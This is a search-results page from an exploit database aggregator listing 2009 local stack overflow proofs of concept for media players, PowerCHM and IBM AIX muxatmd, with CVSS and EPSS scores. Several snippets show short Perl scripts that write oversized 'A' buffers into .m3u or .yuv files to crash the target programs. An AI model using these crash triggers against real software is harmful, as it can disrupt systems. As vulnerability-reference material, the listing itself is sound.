Lucene search
+L

317 matches found

exploitpack
exploitpack
added 2009/04/30 12:0 a.m.21 views

Mercury Audio Player 1.21 - .b4s Local Stack Overflow

Mercury Audio Player 1.21 - .b4s Local Stack Overflow usage: exploit.py print "" print " Mercury Audio Player 1.21 .b4s Local Stack Overflow\n" print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 EN\n" print " greetz: TO ELITE...

0.5AI score
SaveExploits0
Exploit DB
Exploit DB
added 2009/04/30 12:0 a.m.44 views

Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow

usage: exploit.py print "" print " Mercury Audio Player 1.21 .b4s Local Stack Overflow\n" print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 EN\n" print " greetz: TO ELITE ALGERIANS,snakespc.com\n" print "" header1 =...

9.3CVSS5.8AI score0.06815EPSS
SaveExploits2
zdt
zdt
added 2009/04/29 12:0 a.m.37 views

mpegable Player 2.12 (YUV File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc ======================================================== mpegable Player 2.12 YUV File Local Stack Overflow PoC ======================================================== mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104;...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2009/04/29 12:0 a.m.39 views

mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)

mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104; my $file="goldm.yuv"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-29...

9.3CVSS5.8AI score0.056EPSS
SaveExploits2
exploitpack
exploitpack
added 2009/04/29 12:0 a.m.9 views

mpegable Player 2.12 - .yuv Local Stack Overflow (PoC)

mpegable Player 2.12 - .yuv Local Stack Overflow PoC mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104; my $file="goldm.yuv"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"...

1AI score
SaveExploits0
seebug.org
seebug.org
added 2009/04/21 12:0 a.m.20 views

CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC

No description provided by source. CoolPlayerp Portable 2.19.1 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com";...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2009/04/20 12:0 a.m.33 views

CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)

CoolPlayerp Portable 2.19.1 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...

9.3CVSS5.8AI score0.13992EPSS
SaveExploits3
Exploit DB
Exploit DB
added 2009/04/20 12:0 a.m.37 views

Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)

Groovy Media Player Version 1.1.0 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...

5.8AI score
SaveExploits0
zdt
zdt
added 2009/04/20 12:0 a.m.29 views

1by1 1.67 (.m3u File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc...

7AI score
SaveExploits0
zdt
zdt
added 2009/04/20 12:0 a.m.20 views

Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc ============================================================== Groovy Media Player 1.1.0 .m3u File Local Stack Overflow PoC ============================================================== my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE,...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2009/04/20 12:0 a.m.12 views

Groovy Media Player 1.1.0 - .m3u Local Stack Overflow (PoC)

Groovy Media Player 1.1.0 - .m3u Local Stack Overflow PoC Groovy Media Player Version 1.1.0 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; prin...

1.4AI score
SaveExploits0
seebug.org
seebug.org
added 2009/04/18 12:0 a.m.18 views

IBM AIX usr/sbin/muxatmd本地栈溢出漏洞

IBM AIX是一款商业性质的UNIX操作系统。 set-uid root二进制程序muxatmd将调用程序名称与静态字符串.pid连接到一起,而传送给连接后字符串的函数调用的目标缓冲区是固定大小的栈缓冲区。由于没有执行边界检查,如果用超长程序名参数调用了muxatmd的话就可以触发栈溢出,导致执行任意指令。 IBM AIX 6.1 IBM AIX 5.3 IBM AIX 5.2 临时解决方法: 从/usr/sbin/muxatmd二进制程序删除set-uid位。 厂商补丁: IBM --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.9AI score
SaveExploits0
exploitpack
exploitpack
added 2009/04/14 12:0 a.m.11 views

PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)

PowerCHM 5.7 - Long URL Local Stack Overflow PoC PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo [email protected] thnaks to hisok4 Greetz:All friends and muslims HackeRs secdz.com var crash = "http://"; for i=0;iB00M!'; milw0rm.com 2009-04-14...

0.6AI score
SaveExploits0
seebug.org
seebug.org
added 2009/04/14 12:0 a.m.20 views

Mini-stream Ripper (.M3U File) Local Stack Overflow PoC

No description provided by source. !/usr/bin/perl Mini-stream Ripper .M3U File Local Stack Overflow POC Found By : Cyber-Zone ABDELKHALEK E-mail : [email protected] Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM Greetz : Hussin X , Jiko my brother, ZoRLu , Nabilx , Mag!c ompo , Stack ... all...

7.1AI score
SaveExploits0
zdt
zdt
added 2009/04/14 12:0 a.m.17 views

PowerCHM 5.7 (Long URL) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc ================================================ PowerCHM 5.7 Long URL Local Stack Overflow PoC ================================================ PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo email protected thnaks to hisok4...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2009/04/14 12:0 a.m.16 views

PowerCHM 5.7 (Long URL) Local Stack Overflow PoC

No description provided by source. html body br font style="font-family:arial;font-size:24px"PowerCHM 5.7 Long url Local stack overflow SEH POC/fontbr font style="font-family:arial;font-size:19px"found By SuB-ZeRo [email protected] thnaks to hisok4/fontbr br hr size="3" width="500" color="000000" b...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2009/04/14 12:0 a.m.40 views

PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)

PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo [email protected] thnaks to hisok4 Greetz:All friends and muslims HackeRs secdz.com var crash = "http://"; for i=0;iB00M!'; milw0rm.com 2009-04-14...

9.3CVSS5.8AI score0.05554EPSS
SaveExploits2
exploitpack
exploitpack
added 2009/04/13 12:0 a.m.10 views

Mini-stream RM-MP3 Converter 3.0.0.7 - .m3u Local Stack Overflow (PoC)

Mini-stream RM-MP3 Converter 3.0.0.7 - .m3u Local Stack Overflow PoC !/usr/bin/perl Mini-stream RM-MP3 Converter .M3U File Local Stack Overflow POC Found By : Cyber-Zone ABDELKHALEK E-mail : [email protected] Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM Greetz : Hussin X , Jiko my brother,...

1.4AI score
SaveExploits0
exploitpack
exploitpack
added 2009/04/13 12:0 a.m.20 views

ASX to MP3 Converter - .m3u Local Stack Overflow (PoC)

ASX to MP3 Converter - .m3u Local Stack Overflow PoC !/usr/bin/perl ASX to MP3 Converter .M3U File Local Stack Overflow POC Found By : Cyber-Zone ABDELKHALEK E-mail : [email protected] Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM Greetz : Hussin X , Jiko my brother, ZoRLu , Nabilx , Mag!c om...

1.3AI score
SaveExploits0
zdt
zdt
added 2009/04/13 12:0 a.m.16 views

Mini-stream Ripper (.M3U File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc ======================================================= Mini-stream Ripper .M3U File Local Stack Overflow PoC ======================================================= !/usr/bin/perl Mini-stream Ripper .M3U File Local Stack Overflow POC Found By :...

7AI score
SaveExploits0
Rows per page
Query Builder